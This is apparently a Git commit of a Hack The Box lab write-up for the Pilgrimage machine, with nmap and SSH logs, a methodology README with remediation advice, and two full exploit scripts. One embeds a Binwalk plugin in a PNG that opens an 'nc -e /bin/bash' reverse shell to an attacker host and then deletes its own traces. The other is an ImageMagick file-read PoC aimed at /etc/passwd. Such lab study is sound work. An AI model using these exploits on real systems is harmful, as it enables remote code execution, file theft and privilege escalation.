Hack The Box: Add Pilgrimage machine

Author: Hedrobyte

hack_the_box/README.MD

@@ -4,6 +4,12 @@ This folder contains my notes and resolutions for the Hack The Box challenges. I
 * Access [My Hack The Box Profile](https://app.hackthebox.com/profile/1318646) to view my progress and achievements.
 
 
+## Machines
+| Machine                                      | OS      | Difficulty |
+|----------------------------------------------|---------|------------|
+| [Pilgrimage](./machines/pilgrimage/)         | Linux   |  Easy      | 
+
+
 ## Starting Point
 | Machine                                      | OS      | Difficulty |
 |----------------------------------------------|---------|------------|
@@ -17,4 +23,4 @@ This folder contains my notes and resolutions for the Hack The Box challenges. I
 | [Responder](./starting_point/responder/)     | Windows | Very easy  | 
 | [Three](./starting_point/three/)             | Linux   | Very easy  | 
 | [Archetype](./starting_point/archetype/)     | Windows | Very easy  | 
-| [Oopsie](./starting_point/oopsie/)           | Linux   | Very easy  | 
+| [Oopsie](./starting_point/oopsie/)           | Linux   | Very easy  | 

hack_the_box/machines/pilgrimage/CLI/git-dumper_cli

@@ -0,0 +1,3 @@
+└─$ python3 myenv/bin/git-dumper http://pilgrimage.htb/.git/ git
+└─$ ls git
+assets dashboard.php index.php login.php logout.php magick register.php vendor

hack_the_box/machines/pilgrimage/CLI/nmap-scan.txt

@@ -0,0 +1,27 @@
+# Nmap 7.93 scan initiated Fri Jul 14 01:05:23 2023 as: nmap -sV -sC -oN nmap-scan.txt 10.10.11.219
+Nmap scan report for pilgrimage.htb (10.10.11.219)
+Host is up (0.21s latency).
+Not shown: 997 closed tcp ports (conn-refused)
+PORT     STATE    SERVICE VERSION
+22/tcp   open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
+|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
+|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
+80/tcp   open     http    nginx 1.18.0
+|_http-server-header: nginx/1.18.0
+|_http-title: Pilgrimage - Shrink Your Images
+| http-cookie-flags: 
+|   /: 
+|     PHPSESSID: 
+|_      httponly flag not set
+| http-git: 
+|   10.10.11.219:80/.git/
+|     Git repository found!
+|     Repository description: Unnamed repository; edit this file 'description' to name the...
+|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
+1100/tcp filtered mctp
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jul 14 01:07:18 2023 -- 1 IP address (1 host up) scanned in 115.05 seconds

hack_the_box/machines/pilgrimage/CLI/ssh-cli.txt

@@ -0,0 +1,16 @@
+└─$ sudo ssh [email protected]
+[sudo] password for kali: 
+[email protected]'s password: 
+Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+Last login: Fri Jul 14 17:58:05 2023 from 10.10.14.106
+emily@pilgrimage:~$ ls
+binwalk_exploit.png  linpeas.sh  user.txt
+emily@pilgrimage:~$ cat user.txt
+******************************

hack_the_box/machines/pilgrimage/README.MD

@@ -0,0 +1,77 @@
+## General Information
+- Machine: Pilgrimage
+- Difficulty: Easy
+- OS: Linux
+- Date: 15/07/2023
+
+
+## Methodology
+- Reconnaissance: The execution of network scanning using nmap allowed the identification of services running on open ports
+- Exploration: 
+    - Manipulation of files and directories, such as downloading the Git repository using git-dumperindex.php and exploring the /shrunk directory, was performed. 
+    - The identified vulnerabilities, such as CVE-2022-44268 and CVE-2022-4510, were exploited to gain unauthorized access and escalate privileges.
+    - Detailed hexadecimal analysis of files, such as using the "identify -verbose" command and decoding with CyberChef, was performed to extract hidden information.
+- Results Analysis:Documentation of findings, identification of vulnerabilities, and recommendations for remediation.
+
+
+## Results
+During the port scan, two open ports (SSH and HTTP) were discovered, including an HTTP-based Git repository. The repository was downloaded using git-dumperindex.php. A vulnerability (CVE-2022-44268) in ImageMagick was identified, enabling arbitrary file reading on the website. Exploiting this vulnerability provided access to system files, revealing the username "Emily" and her SSH password. Within the system, the "userflag.txt" file was found. Additionally, a vulnerability (CVE-2022-4510) in Binwalk v2.3.2 was detected, allowing for privilege escalation to root. By exploiting this vulnerability, it was possible to obtain access to the root.txt file.
+
+### Reconnaissance
+- 10.10.11.219
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+- http-git: 10.10.11.219:80/.git/
+
+
+- Port Scan results:
+
+| Port     | State | Service      | Version         |
+|----------|-------|--------------|-----------------|   
+| 22/tcp   | open  | ssh          | OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) |
+| 80/tc    | open  | http | nginx 1.18.0 |
+
+
+### Commands and analyzes used
+
+#### Nmap
+~~~nmap
+nmap -sV -sC 10.10.11.219 -oN nmap-scan.txt
+~~~
+
+#### git-dumper
+~~~git-dumper
+python3 git_dumper.py http://pilgrimage.htb/.git/ git 
+~~~
+
+#### script-CVE-2022-44268
+~~~CVE-2022-44268
+python3 generate.py -f  "/etc/passwd"  -o exploit.png
+~~~
+
+~~~
+python3 generate.py -f  "/var/db/pilgrimage"  -o exploit.png 
+~~~
+
+#### script-CVE-2022-4510 
+~~~
+python3 exploit.py photo.jpg <ip> <port>
+~~~
+
+### netcat
+~~~ 
+nc -lvnp <port>
+~~~
+
+
+## Exploited Vulnerabilities
+- Exposed Git repository
+- CVE-2022-44268, i.e. ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
+- CVE-2022-4510: Binwalk v2.3.2 has a vulnerability that allows for remote command execution, enabling privilege escalation.
+
+
+## Recommendations
+- Secure the Git repository: Ensure that the Git repository is not publicly exposed and implement access controls to restrict unauthorized access.
+- Patch and update ImageMagick: Upgrade ImageMagick to a patched version that addresses the CVE-2022-44268 vulnerability to prevent information disclosure attacks.
+- Patch Binwalk: Update Binwalk to a patched version that resolves the CVE-2022-4510 vulnerability, mitigating the potential for remote command execution and privilege escalation.
+- Secure file handling: Implement proper file handling practices, such as validating user input and enforcing file upload restrictions, to prevent the execution of malicious files or unauthorized access to sensitive information.
+- User authentication and authorization: Implement strong user authentication mechanisms, including complex passwords and multi-factor authentication, to protect against unauthorized access to user accounts.

hack_the_box/machines/pilgrimage/exploit_CVE-2022-4510.py

@@ -0,0 +1,56 @@
+# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
+# Exploit Author: Etienne Lacoche
+# CVE-ID: CVE-2022-4510
+import os
+import inspect
+import argparse
+
+print("")
+print("################################################")
+print("------------------CVE-2022-4510----------------")
+print("################################################")
+print("--------Binwalk Remote Command Execution--------")
+print("------Binwalk 2.1.2b through 2.3.2 included-----")
+print("------------------------------------------------")
+print("################################################")
+print("----------Exploit by: Etienne Lacoche-----------")
+print("---------Contact Twitter: @electr0sm0g----------")
+print("------------------Discovered by:----------------")
+print("---------Q. Kaiser, ONEKEY Research Lab---------")
+print("---------Exploit tested on debian 11------------")
+print("################################################")
+print("")
+
+parser = argparse.ArgumentParser()
+parser.add_argument("file", help="Path to input .png file",default=1)
+parser.add_argument("ip", help="Ip to nc listener",default=1)
+parser.add_argument("port", help="Port to nc listener",default=1)
+
+args = parser.parse_args()
+            
+if args.file and args.ip and args.port:
+    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
+    lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n','    def init(self):\n','        if not os.path.exists("/tmp/.binwalk"):\n','            os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n','            with open("/tmp/.binwalk", "w") as f:\n','                f.write("1")\n','        else:\n','            os.remove("/tmp/.binwalk")\n', '            os.remove(os.path.abspath(__file__))\n','            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']
+
+    in_file = open(args.file, "rb")
+    data = in_file.read()
+    in_file.close()
+    
+    with open("/tmp/plugin", "w") as f:
+       for line in lines:
+          f.write(line)
+
+    with open("/tmp/plugin", "rb") as f: 
+        content = f.read()
+
+    os.system("rm /tmp/plugin")
+
+    with open("binwalk_exploit.png", "wb") as f:
+        f.write(data)
+        f.write(header_pfs)
+        f.write(content)
+
+    print("")    
+    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
+    print("")
+            

hack_the_box/machines/pilgrimage/generate.py

@@ -0,0 +1,72 @@
+import png
+import argparse
+import os
+import time
+from PIL import Image, PngImagePlugin
+
+
+#              ,----------------,              ,---------,
+#         ,-----------------------,          ,"        ,"|
+#       ,"                      ,"|        ,"        ,"  |
+#      +-----------------------+  |      ,"        ,"    |
+#      |  .-----------------.  |  |     +---------+      |
+#      |  |                 |  |  |     | -==----'|      |
+#      |  |  Sybil Scan!    |  |  |     |         |      |
+#      |  |                 |  |  |/----|`---=    |      |
+#      |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
+#      |  |                 |  |  |  // |(((( [33]|    ,"
+#      |  `-----------------'  |," .;'| |((((     |  ,"
+#      +-----------------------+  ;;  | |         |,"    
+#         /_)______________(_/  //'   | +---------+
+#    ___________________________/___  `,
+#   /  oooooooooooooooo  .o.  oooo /,   \,"-----------
+#  / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
+# /_==__==========__==_ooo__ooo=_/'   /___________,"
+# `-----------------------------'
+
+
+
+
+
+
+def main():
+    print("\n   [\u001b[32;1m>\u001b[0m] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>")
+    parser = argparse.ArgumentParser(description='imagemagick-LFI : PoC for CVE-2022-44268')
+    parser.add_argument('-f','--lfile' , help = 'Local file to read' , required=True)
+    parser.add_argument('-o', '--output', help = 'Output png file', required=True)
+    args = parser.parse_args()
+    time.sleep(0.2)
+    print("   [\u001b[32;1m>\u001b[0m] Generating Blank PNG")
+    width = 255
+    height = 255
+    img = []
+    for y in range(height):
+        row = ()
+        for x in range(width):
+            row = row + (x, max(0, 255 - x - y), y)
+        img.append(row)
+    with open('gradient.png', 'wb') as f:
+        w = png.Writer(width, height, greyscale=False)
+        w.write(f, img)
+    time.sleep(0.2)
+    print("   [\u001b[32;1m>\u001b[0m] Blank PNG generated")
+    time.sleep(0.2)
+    print(f"   [\u001b[32;1m>\u001b[0m] Placing Payload to read {args.lfile}")
+    info = PngImagePlugin.PngInfo()
+    info.add_text("profile", args.lfile)
+    im = Image.open("gradient.png")
+    im.save(args.output, "PNG", pnginfo=info)
+    time.sleep(0.2)
+    print(f"   [\u001b[32;1m>\u001b[0m] PoC PNG generated > {args.output}")
+
+    
+    gradient_file = "gradient.png"
+    if os.path.isfile(gradient_file):
+        os.remove(gradient_file)
+    else:
+        pass
+
+
+
+if __name__ == '__main__':
+    main()